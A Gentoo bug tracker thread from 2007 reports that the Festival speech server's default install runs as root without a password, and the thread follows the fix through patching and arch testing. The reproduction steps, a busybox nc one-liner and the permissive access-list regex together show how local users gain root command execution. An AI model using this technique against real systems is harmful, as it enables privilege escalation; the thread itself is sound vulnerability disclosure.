Bug 170477 - app-accessibility/festival: privilege elevation with current default setup
|
Bug#:
170477
|
Product: Gentoo Security
|
Version: unspecified
|
Platform: All
|
|
OS/Version: Linux
|
Status: RESOLVED
|
Severity: major
|
Priority: P2
|
|
Resolution: FIXED
|
Assigned To: security@gentoo.org
|
Reported By: shirow@project7.ru
|
|
Component: Default Configs
|
|
|
URL:
|
|
Summary: app-accessibility/festival: privilege elevation with current default setup
|
|
Keywords:
|
|
Status Whiteboard: B1 [glsa] Falco
|
|
Opened: 2007-03-11 20:10 0000
|
Festival as it is currently set up by portage when installed runs under the
root user. If a festival daemon setup is used, the default server password is
nil, i.e. absent.
When the daemon is running, anyone who can connect to the festival daemon at
the normal TCP port can issue the '(system "<whatever>")' command, which will
execute with root privileges. The default configuration denies connection from
anywhere but localhost, but local users can connect and execute commands from
root regardless.
Reproducible: Always
Steps to Reproduce:
Using the festival_client.pl provided in /usr/share/doc/festival-*/ connect to
your localhost festival daemon with a non root user, and enter the command
(system "whoami > /tmp/amiroot")
then exit the client and
cat /tmp/amiroot
There's several approaches to fixing this, but giving the daemon it's own user
account seems the best approach.
thanks for your report. CCing maintainer
adding herds
please comment/fix, since jeeves has not seen williamh for 20days
Herds please advise and provide an updated ebuild as necessary.
Herds/Maintainer please advise
Created an attachment (id=121219) [details]
festival-bug-170477.diff
How about something like this? Run it as it's own user and set it's shell to
/bin/false.
solar@here $ echo '(system "whoami > /tmp/amiroot")' | busybox nc localhost
1314
LP
nil
ft_StUfF_keyOK
solar@here $ cat /tmp/amiroot
festival
I don't know if the 'system' command can/should/could be disabled all together
or if there is a better alternative but this meets the initial
posters suggestion.
(In reply to comment #9)
> I don't know if the 'system' command can/should/could be disabled all together
> or if there is a better alternative but this meets the initial
> posters suggestion.
It shouldn't be disabled altogether because festival extensively uses it
internally (for example, it is required to use mbrola voices). Also, I think
I've seen several code examples which involve using it from the client to play
the speech festival generates, so you probably can't prevent the client from
using it without breaking stuff. But it definitely doesn't have to be root. :)
Adding the festival user to the audio group in the ebuild would be a good idea,
by the way.
(In reply to comment #9)
> Created an attachment (id=121219) [edit] [details]
> festival-bug-170477.diff
>
> How about something like this? Run it as it's own user and set it's shell to
> /bin/false.
It still doesn't stop one for wgetting, building, running shellcode which opens
backdoor to experiment with local exploits to gain root privileges..
> It still doesn't stop one for wgetting, building, running shellcode which opens
> backdoor to experiment with local exploits to gain root privileges..
Considering that connections are only allowed from localhost in the default
configuration, you have to be a local user already to do that, or am I missing
something?
(In reply to comment #10)
> Adding the festival user to the audio group in the ebuild would be a good idea,
> by the way.
Can you please attach an updated diff.
cvs -d :pserver:anonymous@anoncvs.gentoo.org:/var/cvsroot \
co gentoo-x86/app-accessibility/festival
...
cvs diff -u > foo.diff
> Can you please attach an updated diff.
If I knew enough portage, I'd post a diff with that instead of just a bug
report in the first place. :)
Oh, almost forgot, just noticed this. The server.scm configuration file that
comes with the ebuild actually contains:
; Server access list (hosts)
(set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
If 192.168.* is allowed, and you can (system "<whatever>") from a different
machine, the argument about using festival to try local exploits still stands.
Maybe adding a warning to set a server password if you plan to connect to
festival remotely is also in order.
(In reply to comment #15)
> Oh, almost forgot, just noticed this. The server.scm configuration file that
> comes with the ebuild actually contains:
>
> ; Server access list (hosts)
> (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
>
Question:
Would that regexp currently allow remote exec of the "system" command with
a domain such as localhost.is.a.myth.gentoo.org ?
That patch sounds good to me despite it is only a poor workaround.
Sound herd: someone wants to commit it into the tree or can we commit it
ourselves?
I am looking at commiting this tonight or tomorrow.
Thanks.
I have found one issue with this patch so far. The festival server can create
a log, and by default that goes to /var/log/festival.log. That does not work
if festival is running as a user other than root since /var/log is read-only to
any other user. Any suggestions?
(In reply to comment #20)
> I have found one issue with this patch so far. The festival server can create
> a log, and by default that goes to /var/log/festival.log. That does not work
> if festival is running as a user other than root since /var/log is read-only to
> any other user. Any suggestions?
Things like apache, clamav, lighttpd, mysql, snort and squid all use a subdir
in
/var/log/ that is owned by that user. So you want
/var/log/festival/festival.log
The fix for this has been committed to the tree. I'm not sure whether I can
close this or if I should wait for the security team to check it. Please
advise.
Thx William, now it's time for arches.
Arches please test and mark stable. Target keywords are:
festival-1.95_beta-r4.ebuild:KEYWORDS="alpha amd64 hppa ia64 ppc ppc64 sparc
x86"
app-accessibility/festival-1.95_beta-r4 USE="X asterisk -esd -mbrola"
1. emerges on x86
2. passes collision test
3. app-accessibility/gnome-speech-0.4.11 emerges with it
4. works
Portage 2.1.2.7 (default-linux/x86/2007.0/desktop, gcc-4.1.2, glibc-2.5-r3,
2.6.20.12 i686)
=================================================================
System uname: 2.6.20.12 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz
Gentoo Base System release 1.12.9
Timestamp of tree: Sat, 09 Jun 2007 09:00:01 +0000
dev-java/java-config: 1.3.7, 2.0.32
dev-lang/python: 2.3.5-r3, 2.4.4-r4
dev-python/pycrypto: 2.0.1-r5
sys-apps/sandbox: 1.2.17
sys-devel/autoconf: 2.13, 2.61
sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
sys-devel/binutils: 2.16.1-r3
sys-devel/gcc-config: 1.3.16
sys-devel/libtool: 1.5.22
virtual/os-headers: 2.6.17-r2
ACCEPT_KEYWORDS="x86"
AUTOCLEAN="yes"
CBUILD="i686-pc-linux-gnu"
CFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer"
CHOST="i686-pc-linux-gnu"
CONFIG_PROTECT="/etc /usr/kde/3.5/env /usr/kde/3.5/share/config
/usr/kde/3.5/shutdown /usr/share/X11/xkb /usr/share/config"
CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/gconf
/etc/php/apache2-php5/ext-active/ /etc/php/cgi-php5/ext-active/
/etc/php/cli-php5/ext-active/ /etc/revdep-rebuild /etc/terminfo
/etc/texmf/web2c"
CXXFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer"
DISTDIR="/usr/portage/distfiles"
EMERGE_DEFAULT_OPTS="--nospinner"
FEATURES="collision-protect distlocks metadata-transfer parallel-fetch sandbox
sfperms strict test userfetch userpriv usersandbox"
GENTOO_MIRRORS="http://mirror.switch.ch/mirror/gentoo/ http://gentoo.inode.at/"
LINGUAS="en de en_GB de_CH"
MAKEOPTS="-j3"
PKGDIR="/usr/portage/packages"
PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress
--force --whole-file --delete --delete-after --stats --timeout=180
--exclude=/distfiles --exclude=/local --exclude=/packages
--filter=H_**/files/digest-*"
PORTAGE_TMPDIR="/var/tmp"
PORTDIR="/usr/portage"
SYNC="rsync://rsync.gentoo.org/gentoo-portage"
USE="X a52 aac acl acpi alsa apache2 asf avahi berkdb bitmap-fonts cairo cdr
cdrom cli cracklib crypt cups dbus divx dri dts dvd dvdr dvdread eds emboss
encode evo fam ffmpeg firefox flac fortran gdbm gif gnome gpm gstreamer gtk hal
iconv ipv6 isdnlog java jpeg kde kdeenablefinal kerberos ldap libg++ mad midi
mikmod mmx mono mp3 mpeg mudflap ncurses nls nptl nptlonly ogg opengl openmp
oss pam pcre pdf perl png pppd python qt3 qt3support qt4 quicktime readline
reflection rtsp ruby samba sdl session smp spell spl sse sse2 sse3 ssl svg tcpd
test tetex theora threads tiff truetype truetype-fonts type1-fonts unicode vcd
vorbis wifi win32codecs wxwindows x264 x86 xine xml xorg xprint xv xvid zlib"
ELIBC="glibc" INPUT_DEVICES="keyboard mouse" KERNEL="linux" LINGUAS="en de
en_GB de_CH" USERLAND="GNU" VIDEO_CARDS="i810 fbdev vesa"
Unset: CTARGET, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS,
PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS, PORTDIR_OVERLAY
Testing festival-1.95_beta-r4
1. Emerges fine
2. Passes collision
3. Works fine
4. no security hole with test case
$ emerge --info
Portage 2.1.2.7 (default-linux/alpha/2007.0, gcc-4.1.2, glibc-2.5-r2,
2.6.21-gentoo-r1 alpha)
=================================================================
System uname: 2.6.21-gentoo-r1 alpha EV56
Gentoo Base System release 1.12.9
Timestamp of tree: Sat, 09 Jun 2007 14:20:01 +0000
distcc 2.18.3 alpha-unknown-linux-gnu (protocols 1 and 2) (default port 3632)
[enabled]
ccache version 2.4 [enabled]
dev-lang/python: 2.4.4-r4
dev-python/pycrypto: 2.0.1-r5
dev-util/ccache: 2.4-r7
sys-apps/sandbox: 1.2.18.1
sys-devel/autoconf: 2.13, 2.61
sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
sys-devel/binutils: 2.17.50.0.16
sys-devel/gcc-config: 1.3.15-r1
sys-devel/libtool: 1.5.22
virtual/os-headers: 2.6.17-r2
ACCEPT_KEYWORDS="alpha"
AUTOCLEAN="yes"
CBUILD="alpha-unknown-linux-gnu"
CFLAGS="-mieee -pipe -O2 -mcpu=ev56"
CHOST="alpha-unknown-linux-gnu"
CONFIG_PROTECT="/etc /usr/share/X11/xkb /var/bind"
CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/splash
/etc/terminfo"
CXXFLAGS="-mieee -pipe -O2 -mcpu=ev56"
DISTDIR="/usr/portage/distfiles"
FEATURES="ccache collision-protect distcc distlocks metadata-transfer
parallel-fetch sandbox sfperms strict test"
GENTOO_MIRRORS="http://distfiles.gentoo.org
http://distro.ibiblio.org/pub/linux/distributions/gentoo"
LINGUAS="en"
MAKEOPTS="-j3"
PKGDIR="/usr/portage/packages"
PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress
--force --whole-file --delete --delete-after --stats --timeout=180
--exclude=/distfiles --exclude=/local --exclude=/packages
--filter=H_**/files/digest-*"
PORTAGE_TMPDIR="/var/tmp"
PORTDIR="/usr/portage"
PORTDIR_OVERLAY="/usr/portage/local/overlay"
SYNC="rsync://eldest/gentoo-portage"
USE="X acl alpha alsa berkdb bitmap-fonts bzip2 cli cracklib crypt cups curl
dri fortran gdbm gpm iconv ipv6 isdnlog ldap libg++ logrotate midi mudflap
ncurses nls nptl nptlonly openmp pam pcre perl postfix pppd python readline
reflection session spl sqlite ssl startup-notification tcpd test truetype-fonts
type1-fonts unicode xorg zlib" ALSA_CARDS="au8810" ALSA_PCM_PLUGINS="adpcm alaw
asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa
lfloat linear meter mulaw multi null plug rate route share shm softvol"
ELIBC="glibc" INPUT_DEVICES="evdev keyboard mouse joystick" KERNEL="linux"
LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses
text" LINGUAS="en" USERLAND="GNU" VIDEO_CARDS="vga s3virge nv cirrus"
Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LC_ALL, LDFLAGS,
PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS
x86 stable, thanks Markus.
ia64 is there something wrong with stabilization?
ia64 is not security supported :)
Plus i can't test it
it's GLSA 200707-10, thanks
